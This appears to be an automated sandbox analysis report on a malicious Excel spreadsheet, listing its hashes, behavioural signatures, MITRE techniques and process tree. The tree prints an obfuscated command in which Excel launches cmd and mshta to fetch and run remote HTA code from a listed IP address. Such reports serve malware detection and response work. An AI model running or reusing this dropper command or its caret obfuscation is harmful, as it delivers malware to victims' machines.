Analysis

  • max time kernel
    64s
  • max time network
    69s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 01:20

General

  • Target

    2022-1-28-f70181635b6321d67b82173c43965aff.xls

  • Size

    46KB

  • MD5

    f70181635b6321d67b82173c43965aff

  • SHA1

    6adbbe2c6242758948ea7c07848102c4eb714e60

  • SHA256

    097e10a10fddb3bfba40ec406265b8f55c7edc55d3187b87fc5c0c84631278d9

  • SHA512

    7dd971aa1e2692f2d3a7cf6982e98f4daaa8baf4d98b8a40ac37d43c0f88f47fc42f20327d5276805783706e6a23b312180f3fde9faf2fa6e5eeb7c4b1421d05

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2022-1-28-f70181635b6321d67b82173c43965aff.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3248
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        PID:2956
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2956 -s 1656
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1804

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2708-115-0x00007FF969B20000-0x00007FF969B30000-memory.dmp
    Filesize

    64KB

  • memory/2708-116-0x00007FF969B20000-0x00007FF969B30000-memory.dmp
    Filesize

    64KB

  • memory/2708-117-0x00007FF969B20000-0x00007FF969B30000-memory.dmp
    Filesize

    64KB

  • memory/2708-118-0x00007FF969B20000-0x00007FF969B30000-memory.dmp
    Filesize

    64KB

  • memory/2708-121-0x00007FF969B20000-0x00007FF969B30000-memory.dmp
    Filesize

    64KB

  • memory/2708-128-0x00007FF966FD0000-0x00007FF966FE0000-memory.dmp
    Filesize

    64KB

  • memory/2708-129-0x00007FF966FD0000-0x00007FF966FE0000-memory.dmp
    Filesize

    64KB